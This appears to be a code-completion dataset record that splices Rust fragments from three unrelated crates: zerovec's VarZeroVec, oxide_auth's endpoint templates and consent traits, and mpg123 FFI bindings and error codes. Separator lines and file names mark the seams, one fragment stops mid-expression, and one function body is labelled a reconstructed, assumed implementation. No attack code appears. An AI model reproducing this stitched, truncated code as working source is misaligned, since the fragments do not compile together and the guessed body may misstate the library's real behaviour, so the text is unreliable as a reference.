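/// let end = |i: usize| if i + 1 < indices.len() { indices[i + 1] } else { data.len() };
/// assert_eq!(&data[indices[2]..end(2)], "文".as_bytes()); // element 2: bytes 3..6
/// assert_eq!(&data[indices[3]..end(3)], "𑄃".as_bytes()); // last element: bytes 6..10
/// ```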
///
/// [`ule`]: crate::ule
#[non_exhaustive]
pub enum VarZeroVec<'a, T: ?Sized, F = Index16> {
/// An allocated VarZeroVec, allowing for mutations.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let mut vzv = VarZeroVec::<str>::default();
/// vzv.make_mut().push("foo");
/// vzv.make_mut().push("bar");
/// assert!(matches!(vzv, VarZeroVec::Owned(_)));
/// ```
Owned(VarZeroVecOwned<T, F>),
/// A borrowed VarZeroVec, requiring no allocations.
///
/// If a mutating operation is invoked on VarZeroVec, the Borrowed is converted to Owned.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let bytes = &[
/// 4, 0, 0, 0, 0, 0, 1, 0, 3, 0, 6, 0, 119, 207, 137, 230, 150, 135, 240,
/// 145, 132, 131,
/// ];
///
/// let vzv: VarZeroVec<str> = VarZeroVec::parse_byte_slice(bytes).unwrap();
/// assert!(matches!(vzv, VarZeroVec::Borrowed(_)));
/// ```
Borrowed(&'a VarZeroSlice<T, F>),
}
impl<'a, T: ?Sized, F> Clone for VarZeroVec<'a, T, F> {
fn clone(&self) -> Self {
match *self {
VarZeroVec::Owned(ref o) => o.clone().into(),
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> fmt::Debug for VarZeroVec<'_, T, F>
where
T: fmt::Debug,
{
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
VarZeroSlice::fmt(self, f)
}
}
impl<'a, T: ?Sized, F> From<VarZeroVecOwned<T, F>> for VarZeroVec<'a, T, F> {
#[inline]
fn from(other: VarZeroVecOwned<T, F>) -> Self {
VarZeroVec::Owned(other)
}
}
impl<'a, T: ?Sized, F> From<&'a VarZeroSlice<T, F>> for VarZeroVec<'a, T, F> {
fn from(other: &'a VarZeroSlice<T, F>) -> Self {
VarZeroVec::Borrowed(other)
}
}
impl<'a, T: ?Sized + VarULE, F: VarZeroVecFormat> From<VarZeroVec<'a, T, F>>
for VarZeroVecOwned<T, F>
{
#[inline]
fn from(other: VarZeroVec<'a, T, F>) -> Self {
match other {
VarZeroVec::Owned(o) => o,
VarZeroVec::Borrowed(b) => b.into(),
}
}
}
impl<T: VarULE + ?Sized> Default for VarZeroVec<'_, T> {
#[inline]
fn default() -> Self {
Self::new()
}
}
impl<T: VarULE + ?Sized, F: VarZeroVecFormat> Deref for VarZeroVec<'_, T, F> {
type Target = VarZeroSlice<T, F>;
fn deref(&self) -> &VarZeroSlice<T, F> {
self.as_slice()
}
}
impl<'a, T: VarULE + ?Sized, F: VarZeroVecFormat> VarZeroVec<'a, T, F> {
/// Creates a new, empty `VarZeroVec<T>`.
///
/// # Examples
///
/// ```
/// use zerovec::VarZeroVec;
///
/// let vzv: VarZeroVec<str> = VarZeroVec::new();
/// assert!(vzv.is_empty());
/// ```
#[inline]
pub const fn new() -> Self {
Self::Borrowed(VarZeroSlice::new_empty())
}
/// Parse a VarZeroVec from a slice of the appropriate format
///
/// Slices of the right format can be obtained via [`VarZeroSlice::as_bytes()`].
///
/// # Example
///
/// ```rust
/// # use std::str::Utf8Error;
/// # use zerovec::ule::ZeroVecError;
/// # use zerovec::VarZeroVec;
///
/// let strings = vec!["foo", "bar", "baz", "quux"];
/// let vec = VarZeroVec::<str>::from(&strings);
///
/// assert_eq!(&vec[0], "foo");
/// assert_eq!(&vec[1], "bar");
/// assert_eq!(&vec[2], "baz");
/// assert_eq!(&vec[3], "quux");
/// # Ok::<(), ZeroVecError>(())
/// ```
pub fn parse_byte_slice(slice: &'a [u8]) -> Result<Self, ZeroVecError> {
let borrowed = VarZeroSlice::<T, F>::parse_byte_slice(slice)?;
Ok(VarZeroVec::Borrowed(borrowed))
}
/// Uses a `&[u8]` buffer as a `VarZeroVec<T>` without any verification.
///
/// # Safety
///
/// `bytes` need to be an output from [`VarZeroSlice::as_bytes()`].
pub const unsafe fn from_bytes_unchecked(bytes: &'a [u8]) -> Self {
Self::Borrowed(core::mem::
|
/// # use std::str::Utf8Error;
|
random_line_split
|
mod.rs
|
mut self) -> Option<&mut dyn OwnerSolicitor<Request>>;
/// Determine the required scopes for a request.
///
/// The client must fulfill any one scope, so returning an empty slice will always deny the
/// request.
fn scopes(&mut self) -> Option<&mut dyn Scopes<Request>>;
/// Generate a prototype response.
///
/// The endpoint can rely on this being called at most once for each flow, if it wants
/// to preallocate the response or return a handle on an existing prototype.
fn response(
&mut self, request: &mut Request, kind: Template,
) -> Result<Request::Response, Self::Error>;
/// Wrap an error.
fn error(&mut self, err: OAuthError) -> Self::Error;
/// Wrap an error in the request/response types.
fn web_error(&mut self, err: Request::Error) -> Self::Error;
/// Get the central extension instance for this endpoint.
///
/// Returning `None` is the default implementation and acts as simply not providing any extensions.
fn extension(&mut self) -> Option<&mut dyn Extension> {
None
}
}
impl<'a> Template<'a> {
/// Create an OK template
pub fn new_ok() -> Self {
InnerTemplate::Ok.into()
}
/// Create a bad request template
pub fn new_bad(access_token_error: Option<&'a mut AccessTokenError>) -> Self {
InnerTemplate::BadRequest { access_token_error }.into()
}
/// Create an unauthorized template
pub fn new_unauthorized(
error: Option<ResourceError>, access_token_error: Option<&'a mut AccessTokenError>,
) -> Self {
InnerTemplate::Unauthorized {
error,
access_token_error,
}
.into()
}
/// Create a redirect template
pub fn new_redirect(authorization_error: Option<&'a mut AuthorizationError>) -> Self {
InnerTemplate::Redirect { authorization_error }.into()
}
/// The corresponding status code.
pub fn status(&self) -> ResponseStatus {
match self.inner {
InnerTemplate::Unauthorized { .. } => ResponseStatus::Unauthorized,
InnerTemplate::Redirect { .. } => ResponseStatus::Redirect,
InnerTemplate::BadRequest { .. } => ResponseStatus::BadRequest,
InnerTemplate::Ok => ResponseStatus::Ok,
}
}
/// Supplementary information about an error in the authorization code flow.
///
    /// The referenced object can be inspected and manipulated to provide additional information
/// that is specific to this server or endpoint. Such information could be an error page with
/// explanatory information or a customized message.
///
/// ```
/// # use oxide_auth::endpoint::Template;
/// fn explain(mut template: Template) {
/// if let Some(error) = template.authorization_error() {
/// eprintln!("[authorization] An error occurred: {:?}", error.kind());
/// error.explain("This server is still in its infancy. Sorry.");
/// error.explain_uri("/authorization_error.html".parse().unwrap());
/// }
/// }
/// ```
pub fn authorization_error(&mut self) -> Option<&mut AuthorizationError> {
match &mut self.inner {
InnerTemplate::Redirect {
authorization_error, ..
} => reborrow(authorization_error),
_ => None,
}
}
/// Supplementary information about an error in the access token flow.
///
    /// The referenced object can be inspected and manipulated to provide additional information
/// that is specific to this server or endpoint. Such information could be an error page with
/// explanatory information or a customized message.
///
/// ```
/// # use oxide_auth::endpoint::Template;
/// fn explain(mut template: Template) {
/// if let Some(error) = template.access_token_error() {
/// eprintln!("[access_code] An error occurred: {:?}", error.kind());
/// error.explain("This server is still in its infancy. Sorry.");
/// error.explain_uri("/access_token_error.html".parse().unwrap());
/// }
/// }
/// ```
pub fn access_token_error(&mut self) -> Option<&mut AccessTokenError> {
match &mut self.inner {
InnerTemplate::Unauthorized {
access_token_error, ..
} => reborrow(access_token_error),
InnerTemplate::BadRequest {
access_token_error, ..
} => reborrow(access_token_error),
_ => None,
}
}
}
/// Reborrow contained optional reference.
///
/// Slightly tweaked from an `Into`: this produces an `Option<&'a mut T>` from an `&'a mut Option<&mut T>`.
fn reborrow<'a, T>(opt: &'a mut Option<&mut T>) -> Option<&'a mut T> {
match opt {
        // Magically does correct lifetime coercion.
Some(inner) => Some(inner),
None => None,
}
}
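// Illustrative sketch (not part of the original file): `reborrow` hands out a
// shorter-lived `&mut T` without moving the reference out of the stored option,
// which is what the `Template` accessors above rely on.
fn _reborrow_demo() {
    let mut value = 1u32;
    let mut slot: Option<&mut u32> = Some(&mut value);
    if let Some(inner) = reborrow(&mut slot) {
        *inner += 1;
    }
    // The option still holds the original mutable reference after the short borrow ends.
    assert!(slot.is_some());
}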
impl<'a, W: WebRequest> WebRequest for &'a mut W {
type Error = W::Error;
type Response = W::Response;
fn query(&mut self) -> Result<Cow<dyn QueryParameter + 'static>, Self::Error> {
(**self).query()
}
fn urlbody(&mut self) -> Result<Cow<dyn QueryParameter + 'static>, Self::Error> {
(**self).urlbody()
}
fn authheader(&mut self) -> Result<Option<Cow<str>>, Self::Error> {
(**self).authheader()
}
}
impl<'a, R: WebRequest, E: Endpoint<R>> Endpoint<R> for &'a mut E {
type Error = E::Error;
fn registrar(&self) -> Option<&dyn Registrar> {
(**self).registrar()
}
fn authorizer_mut(&mut self) -> Option<&mut dyn Authorizer> {
(**self).authorizer_mut()
}
fn issuer_mut(&mut self) -> Option<&mut dyn Issuer> {
(**self).issuer_mut()
}
fn owner_solicitor(&mut self) -> Option<&mut dyn OwnerSolicitor<R>> {
(**self).owner_solicitor()
}
fn scopes(&mut self) -> Option<&mut dyn Scopes<R>> {
(**self).scopes()
}
fn response(&mut self, request: &mut R, kind: Template) -> Result<R::Response, Self::Error> {
(**self).response(request, kind)
}
fn error(&mut self, err: OAuthError) -> Self::Error {
(**self).error(err)
}
fn web_error(&mut self, err: R::Error) -> Self::Error {
(**self).web_error(err)
}
fn extension(&mut self) -> Option<&mut dyn Extension> {
(**self).extension()
}
}
impl<'a, R: WebRequest, E: Endpoint<R> + 'a> Endpoint<R> for Box<E> {
type Error = E::Error;
fn registrar(&self) -> Option<&dyn Registrar> {
(**self).registrar()
}
fn authorizer_mut(&mut self) -> Option<&mut dyn Authorizer> {
(**self).authorizer_mut()
}
fn issuer_mut(&mut self) -> Option<&mut dyn Issuer> {
(**self).issuer_mut()
}
fn owner_solicitor(&mut self) -> Option<&mut dyn OwnerSolicitor<R>> {
(**self).owner_solicitor()
}
fn scopes(&mut self) -> Option<&mut dyn Scopes<R>> {
(**self).scopes()
}
fn response(&mut self, request: &mut R, kind: Template) -> Result<R::Response, Self::Error> {
(**self).response(request, kind)
}
fn error(&mut self, err: OAuthError) -> Self::Error {
(**self).error(err)
}
fn web_error(&mut self, err: R::Error) -> Self::Error {
(**self).web_error(err)
}
fn extension(&mut self) -> Option<&mut dyn Extension> {
(**self).extension()
}
}
impl Extension for () {}
impl<'a, W: WebRequest, S: OwnerSolicitor<W> + 'a + ?Sized> OwnerSolicitor<W> for &'a mut S {
fn check_consent(
&mut self, request: &mut W, solicitation: Solicitation,
) -> OwnerConsent<W::Response> {
(**self).check_consent(request, solicitation)
}
}
impl<'a, W: WebRequest, S: OwnerSolicitor<W> + 'a + ?Sized> OwnerSolicitor<W> for Box<S> {
fn check_consent(
&mut self, request: &mut W, solicitation: Solicitation,
) -> OwnerConsent<W::Response> {
(**self).check_consent(request, solicitation)
}
}
impl<W: WebRequest> Scopes<W> for [Scope] {
fn scopes(&mut self, _: &mut W) -> &[Scope] {
self
}
}
impl<W: WebRequest> Scopes<W> for Vec<Scope> {
fn scopes(&mut self, _: &mut W) -> &[Scope] {
self.as_slice()
}
}
impl<'a, W: WebRequest> Scopes<W> for &'a [Scope] {
    fn scopes(&mut self, _: &mut W) -> &[Scope] {
        self
    }
}
mod.rs
mod query;
#[cfg(test)]
mod tests;
use std::borrow::Cow;
use std::marker::PhantomData;
pub use crate::primitives::authorizer::Authorizer;
pub use crate::primitives::issuer::Issuer;
pub use crate::primitives::registrar::Registrar;
pub use crate::primitives::scope::Scope;
use crate::code_grant::resource::{Error as ResourceError};
use crate::code_grant::error::{AuthorizationError, AccessTokenError};
use url::Url;
// Re-export the extension traits under prefixed names.
pub use crate::code_grant::authorization::Extension as AuthorizationExtension;
pub use crate::code_grant::accesstoken::Extension as AccessTokenExtension;
pub use crate::code_grant::client_credentials::Extension as ClientCredentialsExtension;
pub use crate::primitives::registrar::PreGrant;
pub use self::authorization::*;
pub use self::accesstoken::*;
pub use self::client_credentials::ClientCredentialsFlow;
pub use self::error::OAuthError;
pub use self::refresh::RefreshFlow;
pub use self::resource::*;
pub use self::query::*;
/// Answer from OwnerAuthorizer to indicate the owner's choice.
pub enum OwnerConsent<Response: WebResponse> {
/// The owner did not authorize the client.
Denied,
/// The owner has not yet decided, i.e. the returned page is a form for the user.
InProgress(Response),
/// Authorization was granted by the specified user.
Authorized(String),
/// An error occurred while checking authorization.
Error(Response::Error),
}
/// Modifiable reason for creating a response to the client.
///
/// Not all responses indicate failure. A redirect will also occur in the regular course of providing an
/// access token to the third party client. When an error is present (see several methods) it is
/// mostly possible to customize it. This hook provides advanced endpoints with the opportunity to
/// set additional parameters and informational messages before they are encoded.
///
/// See the provided methods for more information and examples.
#[derive(Debug)]
pub struct Template<'a> {
inner: InnerTemplate<'a>,
}
/// The general manner of the response.
///
/// These are parallels for HTTP status codes of the same name.
#[derive(Clone, Copy, Debug, Hash, PartialEq, Eq, PartialOrd, Ord)]
pub enum ResponseStatus {
/// The response is issued because the requesting party was not authorized.
Unauthorized,
/// The response redirects in the code grant flow.
Redirect,
/// The request was malformed.
BadRequest,
/// This response is normal and expected.
Ok,
}
/// Encapsulates the different types of response reasons.
///
/// Each variant contains some form of context information about the response. This can be used
/// purely informationally or, in some cases, provides additional customization points. The addition of
/// fields to some variant context can occur in any major release until `1.0`. It is discouraged to
/// exhaustively match the fields directly. Since some context could not permit cloning, the enum will
/// not derive `Clone` until that has been shown unlikely but strongly requested. Please open an issue if you
/// think the pros or cons should be evaluated differently.
#[derive(Debug)]
#[non_exhaustive]
enum InnerTemplate<'a> {
/// Authorization to access the resource has not been granted.
Unauthorized {
/// The underlying cause for denying access.
///
/// The http authorization header is to be set according to this field.
#[allow(dead_code)]
error: Option<ResourceError>,
/// Information on an access token error.
///
/// Endpoints may modify this description to add additional explanatory text or a reference
/// uri for clients seeking explanation.
access_token_error: Option<&'a mut AccessTokenError>,
},
/// Redirect the user-agent to another url.
///
/// The endpoint has the opportunity to inspect and modify error information to some extent.
/// For example to log an error rate or to provide a pointer to a custom human readable
/// explanation page. The response will generally not contain a body.
Redirect {
/// Information on an authorization error.
///
/// Endpoints may modify this description to add additional explanatory text or a reference
/// uri for clients or resource owners seeking explanation.
authorization_error: Option<&'a mut AuthorizationError>,
},
    /// The request did not conform to specification or was otherwise invalid.
///
/// As such, it was not handled further. Some processes still warrant a response body to be
/// set in the case of an invalid request, containing additional information for the client.
/// For example, an authorized client sending a malformed but authenticated request for an
/// access token will receive additional hints on the cause of his mistake.
BadRequest {
/// Information on an invalid-access-token-request error.
///
/// Endpoints may modify this description to add additional explanatory text or a reference
/// uri for clients seeking explanation.
access_token_error: Option<&'a mut AccessTokenError>,
},
/// An expected, normal response.
///
/// The content of the response may require precise semantics to be standard compliant,
/// therefore it is constructed using the `WebResponse` trait methods. Try not to tamper with
/// the format too much, such as unsetting a body etc. after the flow has finished.
Ok,
}
/// A pending solicitation to a resource owner.
///
/// This encapsulates the information available to an [`OwnerSolicitor`] when querying consent
/// information.
///
/// [`OwnerSolicitor`]: trait.OwnerSolicitor.html
pub struct Solicitation<'flow> {
pub(crate) grant: Cow<'flow, PreGrant>,
pub(crate) state: Option<Cow<'flow, str>>,
}
impl<'flow> Solicitation<'flow> {
/// Clone the solicitation into an owned structure.
///
/// This mainly helps with sending it across threads.
pub fn into_owned(self) -> Solicitation<'static> {
Solicitation {
grant: Cow::Owned(self.grant.into_owned()),
state: self.state.map(|state| Cow::Owned(state.into_owned())),
}
}
/// Return the pre-grant associated with the request.
///
/// The information in the `PreGrant` is the authoritative information on the client and scopes
/// associated with the request. It has already been validated against those settings and
/// restrictions that were applied when registering the client.
pub fn pre_grant(&self) -> &PreGrant {
self.grant.as_ref()
}
/// The state provided by the client request.
///
/// This will need to be provided to the response back to the client so it must be preserved
/// across a redirect or a consent screen presented by the user agent.
pub fn state(&self) -> Option<&str> {
match self.state {
None => None,
Some(ref state) => Some(&state),
}
}
/// Create a new solicitation request from a pre grant.
///
/// You usually wouldn't need to call this manually as it is called by the endpoint's flow and
/// then handed with all available information to the solicitor.
pub fn new(grant: &'flow PreGrant) -> Self {
Solicitation {
grant: Cow::Borrowed(grant),
state: None,
}
}
/// Add a client state to the solicitation.
pub fn with_state(self, state: &'flow str) -> Self {
Solicitation {
state: Some(Cow::Borrowed(state)),
..self
}
}
}
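// Illustrative sketch (not part of the original file; `pre_grant` is a
// hypothetical, already-validated `PreGrant`): roughly how a flow builds a
// Solicitation before handing it to an `OwnerSolicitor`.
//
// let solicitation = Solicitation::new(&pre_grant).with_state("opaque-client-state");
// assert_eq!(solicitation.state(), Some("opaque-client-state"));
// let _grant = solicitation.pre_grant();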
/// Checks consent with the owner of a resource, identified in a request.
///
/// See [`frontends::simple`] for an implementation that permits arbitrary functions.
///
/// [`frontends::simple`]: ../frontends/simple/endpoint/struct.FnSolicitor.html
pub trait OwnerSolicitor<Request: WebRequest> {
/// Ensure that a user (resource owner) is currently authenticated (for example via a session
/// cookie) and determine if he has agreed to the presented grants.
fn check_consent(&mut self, _: &mut Request, _: Solicitation) -> OwnerConsent<Request::Response>;
}
/// Determine the scopes applying to a request of a resource.
///
/// It is possible to use a slice of [`Scope`]s as an implementation of this trait. You can inspect
/// the request that was used to access the resource for which the scopes are to be determined but
/// should generally avoid doing so. Sometimes the scope depends on external parameters and this is
/// unavoidable, e.g. if the scope is created dynamically from the path of the resource.
///
/// ## Example
///
/// Here's a possible new implementation that allows you to update your scope list at runtime:
///
/// ```
/// # use oxide_auth::endpoint::Scopes;
/// # use oxide_auth::endpoint::WebRequest;
/// use oxide_auth::primitives::scope::Scope;
/// use std::sync::{Arc, RwLock};
///
/// struct MyScopes {
/// update: RwLock<Arc<[Scope]>>,
/// current: Arc<[Scope]>,
/// };
///
/// impl<R: WebRequest> Scopes<R> for MyScopes {
/// fn scopes(&mut self, _: &mut R) -> &[Scope] {
/// let update = self.update.read().unwrap();
/// if !Arc::ptr_eq(&update, &self.current) {
/// self.current = update.clone();
/// }
/// &self.current
/// }
/// }
/// ```
///
/// [`Scope`]: ../primitives/scope/struct.Scope.html
pub trait Scopes<Request: WebRequest> {
    /// A list of scopes, of which the request must fulfill at least one.
    fn scopes(&mut self, request: &mut Request) -> &[Scope];
}
lib.rs
    /// mpeg layer-1 decoder enabled
    DecodeLayer1,
/// mpeg layer-2 decoder enabled
DecodeLayer2,
/// mpeg layer-3 decoder enabled
DecodeLayer3,
/// accurate decoder rounding
DecodeAccurate,
/// downsample (sample omit)
DecodeDownsample,
/// flexible rate decoding
DecodeNtoM,
/// ICY support
ParseICY,
/// Reader with timeout (network).
TimeoutRead,
}
#[repr(i32)]
#[derive(Copy,Clone,Debug,PartialEq)]
pub enum Mpg123Error {
/// Message: Track ended. Stop decoding.
Done = -12,
/// Message: Output format will be different on next call. Note
/// that some libmpg123 versions between 1.4.3 and 1.8.0 insist on
/// you calling mpg123_getformat() after getting this message
    /// code. Newer versions behave as advertised: You have the
/// chance to call mpg123_getformat(), but you can also just
/// continue decoding and get your data.
NewFormat = -11,
/// Message: For feed reader: "Feed me more!" (call mpg123_feed()
/// or mpg123_decode() with some new input data).
NeedMore = -10,
/// Generic Error
Err = -1,
/// Success
Ok = 0,
/// Unable to set up output format!
BadOutFormat = 1,
/// Invalid channel number specified.
BadChannel = 2,
/// Invalid sample rate specified.
BadRate = 3,
/// Unable to allocate memory for 16 to 8 converter table!
Err16to8Table = 4,
/// Bad parameter id!
BadParam = 5,
/// Bad buffer given -- invalid pointer or too small size.
BadBuffer = 6,
/// Out of memory -- some malloc() failed.
OutOfMem = 7,
/// You didn't initialize the library!
NotInitialized = 8,
/// Invalid decoder choice.
BadDecoder = 9,
/// Invalid mpg123 handle.
BadHandle = 10,
/// Unable to initialize frame buffers (out of memory?).
NoBuffers = 11,
/// Invalid RVA mode.
BadRva = 12,
/// This build doesn't support gapless decoding.
NoGapless = 13,
/// Not enough buffer space.
NoSpace = 14,
/// Incompatible numeric data types.
BadTypes = 15,
/// Bad equalizer band.
BadBand = 16,
/// Null pointer given where valid storage address needed.
ErrNull = 17,
/// Error reading the stream.
ErrReader = 18,
/// Cannot seek from end (end is not known).
NoSeekFromEnd = 19,
/// Invalid 'whence' for seek function.
BadWhence = 20,
/// Build does not support stream timeouts.
NoTimeout = 21,
/// File access error.
BadFile = 22,
/// Seek not supported by stream.
NoSeek = 23,
/// No stream opened.
NoReader = 24,
/// Bad parameter handle.
BadPars = 25,
/// Bad parameters to mpg123_index() and mpg123_set_index()
BadIndexPar = 26,
/// Lost track in bytestream and did not try to resync.
OutOfSync = 27,
/// Resync failed to find valid MPEG data.
ResyncFail = 28,
/// No 8bit encoding possible.
No8bit = 29,
    /// Stack alignment error
BadAlign = 30,
/// Null input buffer with non-zero size...
NullBuffer = 31,
/// Relative seek not possible (screwed up file offset)
NoRelseek = 32,
/// You gave a null pointer somewhere where you shouldn't have.
NullPointer = 33,
/// Bad key value given.
BadKey = 34,
/// No frame index in this build.
NoIndex = 35,
/// Something with frame index went wrong.
IndexFail = 36,
/// Something prevents a proper decoder setup
BadDecoderSetup = 37,
/// This feature has not been built into libmpg123.
MissingFeature = 38,
/// A bad value has been given, somewhere.
BadValue = 39,
/// Low-level seek failed.
LseekFailed = 40,
/// Custom I/O not prepared.
BadCustomIo = 41,
/// Offset value overflow during translation of large file API
/// calls -- your client program cannot handle that large file.
LfsOverflow = 42,
/// Some integer overflow.
IntOverflow = 43,
}
impl From<c_int> for Mpg123Error {
fn from(v: c_int) -> Self {
use Mpg123Error::*;
match v {
-12 => Done,
-11 => NewFormat,
-10 => NeedMore,
-1 => Err,
0 => Ok,
1 => BadOutFormat,
2 => BadChannel,
3 => BadRate,
4 => Err16to8Table,
5 => BadParam,
6 => BadBuffer,
7 => OutOfMem,
8 => NotInitialized,
9 => BadDecoder,
10 => BadHandle,
11 => NoBuffers,
12 => BadRva,
13 => NoGapless,
14 => NoSpace,
15 => BadTypes,
16 => BadBand,
17 => ErrNull,
18 => ErrReader,
19 => NoSeekFromEnd,
20 => BadWhence,
21 => NoTimeout,
22 => BadFile,
23 => NoSeek,
24 => NoReader,
25 => BadPars,
26 => BadIndexPar,
27 => OutOfSync,
28 => ResyncFail,
29 => No8bit,
30 => BadAlign,
31 => NullBuffer,
32 => NoRelseek,
33 => NullPointer,
34 => BadKey,
35 => NoIndex,
36 => IndexFail,
37 => BadDecoderSetup,
38 => MissingFeature,
39 => BadValue,
40 => LseekFailed,
41 => BadCustomIo,
42 => LfsOverflow,
43 => IntOverflow,
_ => Err,
}
}
}
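// Illustrative sketch (not part of the original file): raw libmpg123 return
// codes map through the conversion above, with unknown codes collapsing to `Err`.
fn _mpg123_error_demo() {
    assert_eq!(Mpg123Error::from(-10), Mpg123Error::NeedMore);
    assert_eq!(Mpg123Error::from(0), Mpg123Error::Ok);
    assert_eq!(Mpg123Error::from(999), Mpg123Error::Err);
}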
// This encoding is disastrous, but we have what we have.
bitflags!{
pub flags Enc : i32 {
const ENC_8 = 0x00f,
const ENC_16 = 0x040,
const ENC_24 = 0x4000,
const ENC_32 = 0x100,
const ENC_SIGNED = 0x080,
const ENC_FLOAT = 0xe00,
// Specific formats
const ENC_UNSIGNED_8 = 0x01,
const ENC_SIGNED_8 = ENC_SIGNED.bits | 0x02,
const ENC_ULAW_8 = 0x04,
const ENC_ALAW_8 = 0x08,
const ENC_SIGNED_16 = 0x10 | ENC_16.bits | ENC_SIGNED.bits,
const ENC_UNSIGNED_16 = 0x20 | ENC_16.bits,
const ENC_SIGNED_32 = 0x1000 | ENC_32.bits | ENC_SIGNED.bits,
const ENC_UNSIGNED_32 = 0x2000 | ENC_32.bits,
const ENC_SIGNED_24 = 0x1000 | ENC_24.bits | ENC_SIGNED.bits,
const ENC_UNSIGNED_24 = 0x2000 | ENC_24.bits,
const ENC_FLOAT_32 = 0x200,
const ENC_FLOAT_64 = 0x400,
const ENC_ANY = (ENC_UNSIGNED_8.bits | ENC_SIGNED_8.bits
| ENC_ULAW_8.bits | ENC_ALAW_8.bits
| ENC_SIGNED_16.bits | ENC_UNSIGNED_16.bits
| ENC_SIGNED_32.bits | ENC_UNSIGNED_32.bits
| ENC_SIGNED_24.bits | ENC_UNSIGNED_24.bits
| ENC_FLOAT_32.bits | ENC_FLOAT_64.bits),
}
}
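// Illustrative sketch (not part of the original file): the composite encoding
// flags above embed their width and signedness bits, so membership checks work
// directly on the constants.
fn _enc_flags_demo() {
    assert!(ENC_SIGNED_16.contains(ENC_16));
    assert!(ENC_SIGNED_16.contains(ENC_SIGNED));
    assert!(ENC_ANY.contains(ENC_FLOAT_32 | ENC_FLOAT_64));
}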
impl Enc {
/// Return the number of bytes per mono sample
    pub fn size(&self) -> usize {
        // Reconstructed body (the original was truncated here): delegating to
        // libmpg123's own per-sample size query is the assumed implementation.
        unsafe { mpg123_encsize(self.bits()) as usize }
    }
}
lib.rs
// Decoder selection
pub fn mpg123_decoders() -> *const *const c_char;
pub fn mpg123_supported_decoders() -> *const *const c_char;
pub fn mpg123_decoder(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_current_decoder(handle: *mut Mpg123Handle) -> *const c_char;
// Output format
pub fn mpg123_rates(list: *mut *const c_long, count: *mut size_t);
pub fn mpg123_encodings(list: *mut *const c_int, count: *mut size_t);
pub fn mpg123_encsize(encoding: c_int) -> c_int;
pub fn mpg123_format_none(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_format_all(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_format(handle: *mut Mpg123Handle, rate: c_int, channels: c_int, encodings: c_int) -> c_int;
pub fn mpg123_format_support(handle: *mut Mpg123Handle, rate: c_int, encodings: c_int) -> c_int;
pub fn mpg123_getformat(handle: *mut Mpg123Handle, rate: *mut c_long, channels: *mut c_int, encodings: *mut c_int) -> c_int;
// File input and decoding
pub fn mpg123_open(handle: *mut Mpg123Handle, path: *const c_char) -> c_int;
pub fn mpg123_open_fd(handle: *mut Mpg123Handle, fd: c_int) -> c_int;
pub fn mpg123_open_handle(handle: *mut Mpg123Handle, iohandle: *mut c_void) -> c_int;
pub fn mpg123_open_feed(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_close(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_read(handle: *mut Mpg123Handle, outmem: *mut u8, memsize: size_t, done: *mut size_t) -> c_int;
pub fn mpg123_feed(handle: *mut Mpg123Handle, mem: *const u8, size: size_t) -> c_int;
pub fn mpg123_decode(handle: *mut Mpg123Handle, inmem: *const u8, insize: size_t, outmem: *mut u8, outsize: *mut size_t) -> c_int;
pub fn mpg123_decode_frame(handle: *mut Mpg123Handle, num: *mut off_t, audio: *mut *const u8, bytes: *mut size_t) -> c_int;
pub fn mpg123_framebyframe_decode(handle: *mut Mpg123Handle, num: *mut off_t, audio: *mut *const u8, bytes: *mut size_t) -> c_int;
pub fn mpg123_framebyframe_next(handle: *mut Mpg123Handle) -> c_int;
pub fn mpg123_framedata(handle: *mut Mpg123Handle, header: *mut c_ulong, bodydata: *mut *mut u8, bodybytes: *mut size_t) -> c_int;
pub fn mpg123_framepos(handle: *mut Mpg123Handle) -> off_t;
// Position and seeking
pub fn mpg123_tell(handle: *mut Mpg123Handle) -> off_t;
pub fn mpg123_tellframe(handle: *mut Mpg123Handle) -> off_t;
pub fn mpg123_tell_stream(handle: *mut Mpg123Handle) -> off_t;
pub fn mpg123_seek(handle: *mut Mpg123Handle, sampleoff: off_t, whence: c_int) -> off_t;
pub fn mpg123_feedseek(handle: *mut Mpg123Handle, sampleoff: off_t, whence: c_int, input_offset: *mut off_t) -> off_t;
pub fn mpg123_seek_frame(handle: *mut Mpg123Handle, frameoff: off_t, whence: c_int) -> off_t;
pub fn mpg123_timeframe(handle: *mut Mpg123Handle, sec: c_double) -> off_t;
pub fn mpg123_index(handle: *mut Mpg123Handle, offsets: *mut *const off_t, step: *mut off_t, fill: *mut size_t) -> c_int;
pub fn mpg123_set_index(handle: *mut Mpg123Handle, offsets: *mut off_t, step: off_t, fill: size_t) -> c_int;
// We leave off mpg123_position because it's not stable
// Also everything after mpg123_eq
}
pub enum Mpg123Handle {}
enum_from_primitive!{
#[repr(C)]
pub enum Mpg123Param {
Verbose,
Flags,
AddFlags,
ForceRate,
DownSample,
Rva,
Downspeed,
Upspeed,
StartFrame,
DecodeFrames,
IcyInternal,
Outscale,
Timeout,
RemoveFlags,
ResyncLimit,
IndexSize,
Preframes,
Feedpool,
Feedbuffer,
}
}
// Enum conversion:
// sed -Ee 's@^\s*,?MPG123_([^, ]*),?(\s*=\s*[-x0-9a-fA-F]+)?\s*/\*\*<[ 01]*(.*?)\s*\*/@/// \3\n\1\2,@' |sed -e 's/^/ /' -e 's/\s*$//'
// Bitflags conversion:
// sed -Ee 's@^\s*,?MPG123_([^ ]*)\s*=\s*(0x[0-9a-fA-F]+)\s*/\*\*<[ 01]*(.*?)\s*\*/@/// \3\nconst \1 = \2;@' |sed -e 's/^/ /'
bitflags!{
// Contents generated using
// sed -Ee 's@^\s*,?MPG123_([^ ]*)\s*=\s*(0x[0-9a-fA-F]+)\s*/\*\*<[ 01]*(.*?)\s*\*/@/// \3\nconst \1 = \2;@' |sed -e 's/^/ /'
pub flags Mpg123ParamFlags: c_ulong {
/// Force some mono mode: This is a test bitmask for seeing if
/// any mono forcing is active.
const FLAG_FORCE_MONO = 0x7,
/// Force playback of left channel only.
const FLAG_MONO_LEFT = 0x1,
/// Force playback of right channel only.
const FLAG_MONO_RIGHT = 0x2,
/// Force playback of mixed mono.
const FLAG_MONO_MIX = 0x4,
/// Force stereo output.
const FLAG_FORCE_STEREO = 0x8,
